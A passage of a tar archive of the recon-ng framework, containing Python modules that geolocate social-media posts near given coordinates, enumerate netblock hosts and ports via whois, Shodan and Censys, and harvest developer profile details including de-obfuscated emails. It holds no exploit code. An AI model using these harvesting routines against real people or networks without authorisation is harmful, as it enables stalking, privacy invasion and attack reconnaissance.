lon)) �������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/locations-pushpins/���������������������������������0000775�0000000�0000000�00000000000�13122657244�0024574�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/locations-pushpins/flickr.py������������������������0000664�0000000�0000000�00000006143�13122657244�0026424�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from datetime import datetime import json class Module(BaseModule): meta = { 'name': 'Flickr Geolocation Search', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Searches Flickr for media in the specified proximity to a location.', 'required_keys': ['flickr_api'], 'comments': ( 'Radius must be greater than zero and less than 32 kilometers.', ), 'query': 'SELECT DISTINCT latitude || \',\' || longitude FROM locations WHERE latitude IS NOT NULL AND longitude IS NOT NULL', 'options': ( ('radius', 1, True, 'radius in kilometers'), ), } def module_run(self, points): api_key = self.keys.get('flickr_api') rad = self.options['radius'] url = 'https://api.flickr.com/services/rest/' for point in points: self.heading(point, level=0) lat = point.split(',')[0] lon = point.split(',')[1] payload = {'method': 'flickr.photos.search', 'format': 'json', 'api_key': api_key, 'lat': lat, 'lon': lon, 'has_geo': 1, 'min_taken_date': '1990-01-01 00:00:00', 'extras': 'date_upload,date_taken,owner_name,geo,url_t,url_m', 'radius': rad, 'radius_units':'km', 'per_page': 500} processed = 0 while True: resp = self.request(url, payload=payload) jsonobj = json.loads(resp.text[14:-1]) # check for, and exit on, an erroneous request if jsonobj['stat'] == 'fail': self.error(jsonobj['message']) break if not processed: self.output('Collecting data for ~%s total photos...' % (jsonobj['photos']['total'])) for photo in jsonobj['photos']['photo']: latitude = photo['latitude'] longitude = photo['longitude'] if not all((latitude, longitude)): continue source = 'Flickr' screen_name = photo['owner'] profile_name = photo['ownername'] profile_url = 'http://flickr.com/photos/%s' % screen_name try: media_url = photo['url_m'] except KeyError: media_url = photo['url_t'].replace('_t.', '.') thumb_url = photo['url_t'] message = photo['title'] try: time = datetime.strptime(photo['datetaken'], '%Y-%m-%d %H:%M:%S') except ValueError: time = datetime(1970, 1, 1) self.add_pushpins(source, screen_name, profile_name, profile_url, media_url, thumb_url, message, latitude, longitude, time) processed += len(jsonobj['photos']['photo']) self.verbose('%s photos processed.' % (processed)) if jsonobj['photos']['page'] >= jsonobj['photos']['pages']: break payload['page'] = jsonobj['photos']['page'] + 1 �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/locations-pushpins/instagram.py���������������������0000664�0000000�0000000�00000007232�13122657244�0027137�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from datetime import datetime import json import re class Module(BaseModule): meta = { 'name': 'Instagram Geolocation Search', 'author': 'Nathan Malcolm (@SintheticLabs) and Tim Tomes (@LaNMaSteR53)', 'description': 'Searches Instagram for media in the specified proximity to a location.', 'required_keys': ['instagram_api', 'instagram_secret'], 'comments': ( 'Radius must be greater than zero and no more than 5 kilometers (5000 meters).', ), 'query': 'SELECT DISTINCT latitude || \',\' || longitude FROM locations WHERE latitude IS NOT NULL AND longitude IS NOT NULL', 'options': ( ('radius', 1, True, 'radius in kilometers'), ), } def get_instagram_access_token(self): return self.get_explicit_oauth_token( 'instagram', 'basic public_content', 'https://instagram.com/oauth/authorize/', 'https://api.instagram.com/oauth/access_token' ) def module_run(self, points): access_token = self.get_instagram_access_token() rad = str(int(self.options['radius']) * 1000) url = 'https://api.instagram.com/v1/media/search' for point in points: self.heading(point, level=0) lat = point.split(',')[0] lon = point.split(',')[1] payload = {'lat': lat, 'lng': lon, 'distance': rad, 'access_token': access_token} processed = 0 while True: resp = self.request(url, payload=payload) jsonobj = json.loads(resp.text) # check for an erroneous request if jsonobj['meta']['code'] != 200: # check for an expired access token if jsonobj['meta']['code'] == 400: # renew token self.delete_key('instagram_token') payload['access_token'] = self.get_instagram_access_token() continue self.error(jsonobj['meta']['error_message']) break if not processed: self.output('Collecting data for an unknown number of photos...') for item in jsonobj['data']: latitude = item['location']['latitude'] longitude = item['location']['longitude'] if not all((latitude, longitude)): continue source = 'Instagram' screen_name = item['user']['username'] profile_name = item['user']['full_name'] profile_url = 'http://instagram.com/%s' % screen_name media_url = item['images']['standard_resolution']['url'] thumb_url = item['images']['thumbnail']['url'] try: message = item['caption']['text'] except: message = '' try: time = datetime.fromtimestamp(float(item['created_time'])) except ValueError: time = datetime(1970, 1, 1) self.add_pushpins(source, screen_name, profile_name, profile_url, media_url, thumb_url, message, latitude, longitude, time) processed += len(jsonobj['data']) self.verbose('%s photos processed.' % (processed)) if len(jsonobj['data']) < 20: self.verbose(len(jsonobj['data'])) break payload['max_timestamp'] = jsonobj['data'][19]['created_time'] ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/locations-pushpins/picasa.py������������������������0000664�0000000�0000000�00000006467�13122657244�0026423�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from datetime import datetime import math class Module(BaseModule): meta = { 'name': 'Picasa Geolocation Search', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Searches Picasa for media in the specified proximity to a location.', 'query': 'SELECT DISTINCT latitude || \',\' || longitude FROM locations WHERE latitude IS NOT NULL AND longitude IS NOT NULL', 'options': ( ('radius', 1, True, 'radius in kilometers'), ), } def module_run(self, points): rad = self.options['radius'] url = 'http://picasaweb.google.com/data/feed/api/all' kilometers_per_degree_latitude = 111.12 for point in points: self.heading(point, level=0) lat = point.split(',')[0] lon = point.split(',')[1] # http://www.johndcook.com/blog/2009/04/27/converting-miles-to-degrees-longitude-or-latitude west_boundary = float(lon) - (math.cos(math.radians(float(lat))) * float(rad) / kilometers_per_degree_latitude) south_boundary = float(lat) - (float(rad) / kilometers_per_degree_latitude) east_boundary = float(lon) + (math.cos(math.radians(float(lat))) * float(rad) / kilometers_per_degree_latitude) north_boundary = float(lat) + (float(rad) / kilometers_per_degree_latitude) payload = {'alt': 'json', 'strict': 'true', 'bbox': '%.6f,%.6f,%.6f,%.6f' % (west_boundary, south_boundary, east_boundary, north_boundary)} processed = 0 while True: resp = self.request(url, payload=payload) jsonobj = resp.json if not jsonobj: self.error(resp.text) break if not processed: self.output('Collecting data for an unknown number of photos...') if not 'entry' in jsonobj['feed']: break for photo in jsonobj['feed']['entry']: if 'georss$where' not in photo: continue source = 'Picasa' screen_name = photo['author'][0]['name']['$t'] profile_name = photo['author'][0]['name']['$t'] profile_url = photo['author'][0]['uri']['$t'] media_url = photo['content']['src'] thumb_url = '/s72/'.join(media_url.rsplit('/', 1)) message = photo['title']['$t'] latitude = photo['georss$where']['gml$Point']['gml$pos']['$t'].split()[0] longitude = photo['georss$where']['gml$Point']['gml$pos']['$t'].split()[1] time = datetime.strptime(photo['published']['$t'], '%Y-%m-%dT%H:%M:%S.%fZ') self.add_pushpins(source, screen_name, profile_name, profile_url, media_url, thumb_url, message, latitude, longitude, time) processed += len(jsonobj['feed']['entry']) self.verbose('%s photos processed.' % (processed)) qty = jsonobj['feed']['openSearch$itemsPerPage']['$t'] start = jsonobj['feed']['openSearch$startIndex']['$t'] next = qty + start if next > 1000: break payload['start-index'] = next ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/locations-pushpins/shodan.py������������������������0000664�0000000�0000000�00000004243�13122657244�0026425�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from datetime import datetime class Module(BaseModule): meta = { 'name': 'Shodan Geolocation Search', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Searches Shodan for media in the specified proximity to a location.', 'required_keys': ['shodan_api'], 'comments': ( 'Shodan \'geo\' searches can take a long time to complete. If receiving connection timeout errors, increase the global SOCKET_TIMEOUT option.', ), 'query': 'SELECT DISTINCT latitude || \',\' || longitude FROM locations WHERE latitude IS NOT NULL AND longitude IS NOT NULL', 'options': ( ('radius', 1, True, 'radius in kilometers'), ('limit', 1, True, 'limit number of api requests per input source (0 = unlimited)'), ), } def module_run(self, points): limit = self.options['limit'] rad = self.options['radius'] for point in points: self.heading(point, level=0) query = 'geo:%s,%d' % (point, rad) results = self.search_shodan_api(query, limit) for host in results: os = host['os'] if 'os' in host else '' hostname = host['hostnames'][0] if len(host['hostnames']) > 0 else 'None' protocol = '%s:%d' % (host['ip_str'], host['port']) source = 'Shodan' screen_name = protocol profile_name = protocol profile_url = 'http://%s' % (protocol) media_url = 'https://www.shodan.io/host/%s' % (host['ip_str']) thumb_url = 'https://gravatar.com/avatar/ffc4048d63729d4932fd3cc45139174f?s=300' message = 'Hostname: %s | City: %s, %s | OS: %s' % (hostname, host['location']['city'], host['location']['country_name'], os) latitude = host['location']['latitude'] longitude = host['location']['longitude'] time = datetime.strptime(host['timestamp'], '%Y-%m-%dT%H:%M:%S.%f') self.add_pushpins(source, screen_name, profile_name, profile_url, media_url, thumb_url, message, latitude, longitude, time) �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/locations-pushpins/twitter.py�����������������������0000664�0000000�0000000�00000003661�13122657244�0026656�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from datetime import datetime from urlparse import parse_qs class Module(BaseModule): meta = { 'name': 'Twitter Geolocation Search', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Searches Twitter for media in the specified proximity to a location.', 'required_keys': ['twitter_api', 'twitter_secret'], 'query': 'SELECT DISTINCT latitude || \',\' || longitude FROM locations WHERE latitude IS NOT NULL AND longitude IS NOT NULL', 'options': ( ('radius', 1, True, 'radius in kilometers'), ), } def module_run(self, points): rad = self.options['radius'] url = 'https://api.twitter.com/1.1/search/tweets.json' for point in points: self.heading(point, level=0) self.output('Collecting data for an unknown number of tweets...') results = self.search_twitter_api({'q':'', 'geocode': '%s,%fkm' % (point, rad)}) for tweet in results: if not tweet['geo']: continue tweet_id = tweet['id_str'] source = 'Twitter' screen_name = tweet['user']['screen_name'] profile_name = tweet['user']['name'] profile_url = 'https://twitter.com/%s' % screen_name media_url = 'https://twitter.com/%s/statuses/%s' % (screen_name, tweet_id) thumb_url = tweet['user']['profile_image_url_https'] message = tweet['text'] latitude = tweet['geo']['coordinates'][0] longitude = tweet['geo']['coordinates'][1] time = datetime.strptime(tweet['created_at'], '%a %b %d %H:%M:%S +0000 %Y') self.add_pushpins(source, screen_name, profile_name, profile_url, media_url, thumb_url, message, latitude, longitude, time) self.verbose('%s tweets processed.' % (len(results))) �������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/locations-pushpins/youtube.py�����������������������0000664�0000000�0000000�00000005512�13122657244�0026645�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from datetime import datetime class Module(BaseModule): meta = { 'name': 'YouTube Geolocation Search', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Searches the YouTube API for media in the specified proximity to a location.', 'required_keys': ['google_api'], 'query': 'SELECT DISTINCT latitude || \',\' || longitude FROM locations WHERE latitude IS NOT NULL AND longitude IS NOT NULL', 'options': ( ('radius', 1, True, 'radius in kilometers'), ), } def module_run(self, locations): self.api_key = self.keys.get('google_api') self.url = 'https://www.googleapis.com/youtube/v3/%s' payload = {'part': 'snippet', 'type': 'video', 'key': self.api_key, 'locationRadius': '%skm' % (self.options['radius']), 'maxResults': 5} for location in locations: self.heading(location, level=0) payload['location'] = location processed = 0 while True: resp = self.request(self.url % 'search', payload=payload) if not processed: self.output('Collecting data for %d videos...' % (resp.json['pageInfo']['totalResults'])) if not 'items' in resp.json: break for video in resp.json['items']: source = 'YouTube' screen_name = video['snippet']['channelTitle'] or 'Unknown' profile_name = screen_name profile_url = 'http://www.youtube.com/channel/%s' % video['snippet']['channelId'] media_url = 'https://www.youtube.com/watch?v=%s' % video['id']['videoId'] thumb_url = video['snippet']['thumbnails']['high']['url'] message = video['snippet']['title'] latitude, longitude = self.get_video_geo(video['id']['videoId']) time = datetime.strptime(video['snippet']['publishedAt'], '%Y-%m-%dT%H:%M:%S.%fZ') self.add_pushpins(source, screen_name, profile_name, profile_url, media_url, thumb_url, message, latitude, longitude, time) processed += len(resp.json['items']) self.verbose('%s videos processed.' % (processed)) if 'nextPageToken' in resp.json: payload['pageToken'] = resp.json['nextPageToken'] continue break def get_video_geo(self, vid): payload = {'part': 'recordingDetails', 'id': vid, 'key': self.api_key} resp = self.request(self.url % 'videos', payload=payload) latitude = resp.json['items'][0]['recordingDetails']['location']['latitude'] longitude = resp.json['items'][0]['recordingDetails']['location']['longitude'] return latitude, longitude ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/netblocks-companies/��������������������������������0000775�0000000�0000000�00000000000�13122657244�0024672�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/netblocks-companies/whois_orgs.py�������������������0000664�0000000�0000000�00000002602�13122657244�0027427�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from urlparse import urlparse class Module(BaseModule): meta = { 'name': 'Whois Company Harvester', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Uses the ARIN Whois RWS to harvest Companies data from whois queries for the given netblock. Updates the \'companies\' table with the results.', 'query': 'SELECT DISTINCT netblock FROM netblocks WHERE netblock IS NOT NULL', } def module_run(self, netblocks): headers = {'Accept': 'application/json'} for netblock in netblocks: self.heading(netblock, level=0) urls = [ 'http://whois.arin.net/rest/cidr/%s' % (netblock), 'http://whois.arin.net/rest/ip/%s' % (netblock.split('/')[0]), ] for url in urls: self.verbose('URL: %s' % url) resp = self.request(url, headers=headers) if 'No record found for the handle provided.' in resp.text: self.output('No companies found.') continue for ref in ['orgRef', 'customerRef']: if ref in resp.json['net']: company = resp.json['net'][ref]['@name'] handle = resp.json['net'][ref]['$'] self.add_companies(company=company, description=handle) ������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/netblocks-hosts/������������������������������������0000775�0000000�0000000�00000000000�13122657244�0024054�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/netblocks-hosts/reverse_resolve.py������������������0000664�0000000�0000000�00000003377�13122657244�0027652�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from recon.mixins.resolver import ResolverMixin import dns.resolver import dns.reversename class Module(BaseModule, ResolverMixin): meta = { 'name': 'Reverse Resolver', 'author': 'John Babio (@3vi1john)', 'description': 'Conducts a reverse lookup for each of a netblock\'s IP addresses to resolve the hostname. Updates the \'hosts\' table with the results.', 'query': 'SELECT DISTINCT netblock FROM netblocks WHERE netblock IS NOT NULL', } def module_run(self, netblocks): max_attempts = 3 resolver = self.get_resolver() for netblock in netblocks: self.heading(netblock, level=0) addresses = self.cidr_to_list(netblock) for address in addresses: attempt = 0 while attempt < max_attempts: try: addr = dns.reversename.from_address(address) hosts = resolver.query(addr,'PTR') except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer): self.verbose('%s => No record found.' % (address)) except dns.resolver.Timeout: self.verbose('%s => Request timed out.' % (address)) attempt += 1 continue except (dns.resolver.NoNameservers): self.verbose('%s => Invalid nameserver.' % (address)) else: for host in hosts: host = str(host)[:-1] # slice the trailing dot self.add_hosts(host, address) # break out of the loop attempt = max_attempts �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/netblocks-hosts/shodan_net.py�����������������������0000664�0000000�0000000�00000002360�13122657244�0026551�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import re class Module(BaseModule): meta = { 'name': 'Shodan Network Enumerator', 'author': 'Mike Siegel and Tim Tomes (@LaNMaSteR53)', 'description': 'Harvests hosts from the Shodan API by using the \'net\' search operator. Updates the \'hosts\' table with the results.', 'required_keys': ['shodan_api'], 'query': 'SELECT DISTINCT netblock FROM netblocks WHERE netblock IS NOT NULL', 'options': ( ('limit', 1, True, 'limit number of api requests per input source (0 = unlimited)'), ), } def module_run(self, netblocks): limit = self.options['limit'] for netblock in netblocks: self.heading(netblock, level=0) query = 'net:%s' % (netblock) results = self.search_shodan_api(query, limit) for host in results: address = host['ip_str'] port = host['port'] if not host['hostnames']: host['hostnames'] = [None] for hostname in host['hostnames']: self.add_ports(ip_address=address, port=port, host=hostname) self.add_hosts(host=hostname, ip_address=address) ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/netblocks-ports/������������������������������������0000775�0000000�0000000�00000000000�13122657244�0024063�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/netblocks-ports/census_2012.py����������������������0000664�0000000�0000000�00000002573�13122657244�0026410�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import re class Module(BaseModule): meta = { 'name': 'Internet Census 2012 Lookup', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Queries the Internet Census 2012 data through Exfiltrated.com to enumerate open ports for a netblock.', 'comments': ( 'http://exfiltrated.com/querystart.php', ), 'query': 'SELECT DISTINCT netblock FROM netblocks WHERE netblock IS NOT NULL', } def module_run(self, netblocks): url = 'http://exfiltrated.com/query.php' for netblock in netblocks: self.heading(netblock, level=0) addresses = self.cidr_to_list(netblock) first = addresses[0] last = addresses[-1] self.verbose('%s (%s - %s)' % (netblock, first, last)) payload = {'startIP': first, 'endIP': last, 'includeHostnames': 'Yes', 'rawDownload': 'Yes'} resp = self.request(url, payload=payload) hosts = resp.text.strip().split('\r\n')[1:] for host in hosts: elements = host.split('\t') address = elements[1] port = elements[2] hostname = elements[0] self.add_ports(ip_address=address, host=hostname, port=port) if not hosts: self.output('No scan data available.') �������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/netblocks-ports/censysio.py�������������������������0000664�0000000�0000000�00000004643�13122657244�0026300�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import time class Module(BaseModule): meta = { 'name': 'Censys.io Netblock Enumerator', 'author': 'John Askew (https://bitbucket.org/skew)', 'description': 'Queries the censys.io API to enumerate information about netblocks.', 'required_keys': ['censysio_id', 'censysio_secret'], 'comments': ( 'To enumerate ports for hosts, use the following query as the SOURCE option.', '\tSELECT DISTINCT ip_address || \'/32\' FROM hosts WHERE ip_address IS NOT NULL', 'Leak rates may vary. Each user\'s leak rate is listed in their Censys.io account.', ), 'query': 'SELECT DISTINCT netblock FROM netblocks WHERE netblock IS NOT NULL', 'options': ( ('rate', .2, True, 'search endpoint leak rate (tokens/second)'), ('limit', True, True, 'toggle rate limiting'), ), } def module_run(self, netblocks): for netblock in netblocks: self.heading(netblock, level=0) page = 1 while True: resp = self._get_page(netblock, page) if resp.status_code != 200: self.error('Error: \'%s\'' % (resp.json.get('error'))) break self._load_results(resp) if resp.json.get('metadata').get('page') >= resp.json.get('metadata').get('pages'): break self.verbose('Fetching the next page of results...') page += 1 def _get_page(self, netblock, page): payload = { 'query': 'ip:{}'.format(netblock), 'page': page, 'fields': ['ip', 'protocols'] } resp = self.request( 'https://censys.io/api/v1/search/ipv4', payload=payload, auth=( self.keys.get('censysio_id'), self.keys.get('censysio_secret') ), method='POST', content='JSON', ) if self.options['limit']: time.sleep(1 / self.options['rate']) return resp def _load_results(self, resp): for result in resp.json.get('results'): ip_address = result.get('ip') for service in result.get('protocols'): port, protocol = service.split('/') self.add_ports(ip_address=ip_address, port=port, protocol=protocol) ���������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/ports-hosts/����������������������������������������0000775�0000000�0000000�00000000000�13122657244�0023237�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/ports-hosts/migrate_ports.py������������������������0000664�0000000�0000000�00000001221�13122657244�0026464�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import re class Module(BaseModule): meta = { 'name': 'Ports to Hosts Data Migrator', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Adds a new host for all the hostnames stored in the \'ports\' table.', } def module_run(self): # ip address regex regex = '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' # get a list of hosts that are not ip addresses hosts = [x[0] for x in self.query('SELECT DISTINCT host FROM ports WHERE host IS NOT NULL') if not re.match(regex, x[0])] for host in hosts: self.add_hosts(host=host) �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/profiles-contacts/����������������������������������0000775�0000000�0000000�00000000000�13122657244�0024371�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/profiles-contacts/dev_diver.py����������������������0000664�0000000�0000000�00000024364�13122657244�0026723�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import json import re import time import urllib class Module(BaseModule): meta = { 'name': 'Dev Diver Repository Activity Examiner', 'author': 'Micah Hoffman (@WebBreacher)', 'description': 'Searches public code repositories for information about a given username.', 'query': 'SELECT DISTINCT username FROM profiles WHERE username IS NOT NULL', } # Add a method for each repository def github(self, username): self.verbose('Checking Github...') url = 'https://api.github.com/users/%s' % (username) resp = self.request(url) data = resp.json if data.has_key('login'): self.alert('Github username found - (%s)' % url) # extract data from the optional fields gitName = data['name'] if data.has_key('name') else None gitCompany = data['company'] if data.has_key('company') else None gitBlog = data['blog'] if data.has_key('blog') else None gitLoc = data['location'] if data.has_key('location') else None gitEmail = data['email'] if data.has_key('email') else None gitBio = data['bio'] if data.has_key('bio') else None gitJoin = data['created_at'].split('T') gitUpdate = data['updated_at'].split('T') # build and display a table of the results tdata = [] tdata.append(['Resource', 'Github']) tdata.append(['User Name', data['login']]) tdata.append(['Real Name', gitName]) if gitName else None tdata.append(['Profile URL', data['html_url']]) tdata.append(['Avatar URL', data['avatar_url']]) tdata.append(['Location', gitLoc]) tdata.append(['Company', gitCompany]) tdata.append(['Blog URL', gitBlog]) tdata.append(['Email', gitEmail]) tdata.append(['Bio', gitBio]) tdata.append(['Followers', data['followers']]) tdata.append(['ID', data['id']]) tdata.append(['Joined', gitJoin[0]]) tdata.append(['Updated', gitUpdate[0]]) self.table(tdata, title='Github') # add the pertinent information to the database if not gitName: gitName = username fname, mname, lname = self.parse_name(gitName) self.add_contacts(first_name=fname, middle_name=mname, last_name=lname, title='Github Contributor') else: self.output('Github username not found.') def bitbucket(self, username): self.verbose('Checking Bitbucket...') url = 'https://bitbucket.org/api/2.0/users/%s' % (username) resp = self.request(url) data = resp.json if data.has_key('username'): self.alert('Bitbucket username found - (%s)' % url) # extract data from the optional fields bbName = data['display_name'] bbJoin = data['created_on'].split('T') # build and display a table of the results tdata = [] tdata.append(['Resource', 'Bitbucket']) tdata.append(['User Name', data['username']]) tdata.append(['Display Name', bbName]) tdata.append(['Location', data['location']]) tdata.append(['Joined', bbJoin[0]]) tdata.append(['Personal URL', data['website']]) tdata.append(['Bitbucket URL', data['links']['html']['href']]) #tdata.append(['Avatar URL', data['user']['avatar']]) # This works but is SOOOO long it messes up the table self.table(tdata, title='Bitbucket') # add the pertinent information to the database if not bbName: bbName = username fname, mname, lname = self.parse_name(bbName) self.add_contacts(first_name=fname, middle_name=mname, last_name=lname, title='Bitbucket Contributor') else: self.output('Bitbucket username not found.') def sourceforge(self, username): self.verbose('Checking SourceForge...') url = 'http://sourceforge.net/u/%s/profile/' % (username) resp = self.request(url) sfName = re.search('<title>(.+) / Profile', resp.text) if sfName: self.alert('Sourceforge username found - (%s)' % url) # extract data sfJoin = re.search('<dt>Joined:</dt><dd>\s*(\d\d\d\d-\d\d-\d\d) ', resp.text) sfLocation = re.search('<dt>Location:</dt><dd>\s*(\w.*)', resp.text) sfGender = re.search('<dt>Gender:</dt><dd>\s*(\w.*)', resp.text) sfProjects = re.findall('class="project-info">\s*<a href="/p/.+/">(.+)</a>', resp.text) # establish non-match values sfName = sfName.group(1) sfJoin = sfJoin.group(1) if sfJoin else None sfLocation = sfLocation.group(1) if sfLocation else None sfGender = sfGender.group(1) if sfGender else None # build and display a table of the results tdata = [] tdata.append(['Resource', 'Sourceforge']) tdata.append(['Name', sfName]) tdata.append(['Profile URL', url]) tdata.append(['Joined', sfJoin]) tdata.append(['Location', sfLocation]) tdata.append(['Gender', sfGender]) for sfProj in sfProjects: tdata.append(['Projects', sfProj]) self.table(tdata, title='Sourceforge') # add the pertinent information to the database if not sfName: sfName = username fname, mname, lname = self.parse_name(sfName) self.add_contacts(first_name=fname, middle_name=mname, last_name=lname, title='Sourceforge Contributor') else: self.output('Sourceforge username not found.') def codeplex(self, username): self.verbose('Checking CodePlex...') url = 'http://www.codeplex.com/site/users/view/%s' % (username) resp = self.request(url) cpName = re.search('<h1 class="user_name" style="display: inline">(.+)</h1>', resp.text) if cpName: self.alert('CodePlex username found - (%s)' % url) # extract data cpJoin = re.search('Member Since<span class="user_float">([A-Z].+[0-9])</span>', resp.text) cpLast = re.search('Last Visit<span class="user_float">([A-Z].+[0-9])</span>', resp.text) cpCoordinator = re.search('(?s)<p class="OverflowHidden">(.*?)</p>', resp.text) # establish non-match values cpName = cpName.group(1) if cpName else None cpJoin = cpJoin.group(1) if cpJoin else 'January 1, 1900' cpLast = cpLast.group(1) if cpLast else 'January 1, 1900' cpCoordinator = cpCoordinator.group(1) if cpCoordinator else '' # build and display a table of the results tdata = [] tdata.append(['Resource', 'CodePlex']) tdata.append(['Name', cpName]) tdata.append(['Profile URL', url]) tdata.append(['Joined', time.strftime('%Y-%m-%d', time.strptime(cpJoin, '%B %d, %Y'))]) tdata.append(['Date Last', time.strftime('%Y-%m-%d', time.strptime(cpLast, '%B %d, %Y'))]) cpCoordProject = re.findall('<a href="(http://.+)/" title=".+">(.+)<br /></a>', cpCoordinator) for cpReposUrl, cpRepos in cpCoordProject: tdata.append(['Project', '%s (%s)' % (cpRepos, cpReposUrl)]) self.table(tdata, title='CodePlex') # add the pertinent information to the database if not cpName: cpName = username fname, mname, lname = self.parse_name(cpName) self.add_contacts(first_name=fname, middle_name=mname, last_name=lname, title='CodePlex Contributor') else: self.output('CodePlex username not found.') def gitorious(self, username): self.verbose('Checking Gitorious...') url = 'https://gitorious.org/~%s' % (username) resp = self.request(url) if re.search('href="/~%s" class="avatar"' % (username), resp.text): self.alert('Gitorious username found - (%s)' % url) # extract data gitoName = re.search('<strong>([^<]*)</strong>\s+</li>\s+<li class="email">', resp.text) # Gitorious URL encodes the user's email to obscure it...lulz. No problem. gitoEmailRaw = re.search("eval\(decodeURIComponent\('(.+)'", resp.text) gitoEmail = re.search(r'mailto:([^\\]+)', urllib.unquote(gitoEmailRaw.group(1))) if gitoEmailRaw else None gitoJoin = re.search('Member for (.+)', resp.text) gitoPersonalUrl = re.search('rel="me" href="(.+)">', resp.text) gitoProjects = re.findall('<tr class="project">\s+<td>\s+<a href="/([^"]*)">([^<]*)</a>\s+</td>\s+</tr>', resp.text) # establish non-match values gitoName = gitoName.group(1) if gitoName else None gitoEmail = gitoEmail.group(1) if gitoEmail else None gitoJoin = gitoJoin.group(1) if gitoJoin else None gitoPersonalUrl = gitoPersonalUrl.group(1) if gitoPersonalUrl else None # build and display a table of the results tdata = [] tdata.append(['Resource', 'Gitorious']) tdata.append(['Name', gitoName]) tdata.append(['Profile URL', url]) tdata.append(['Membership', 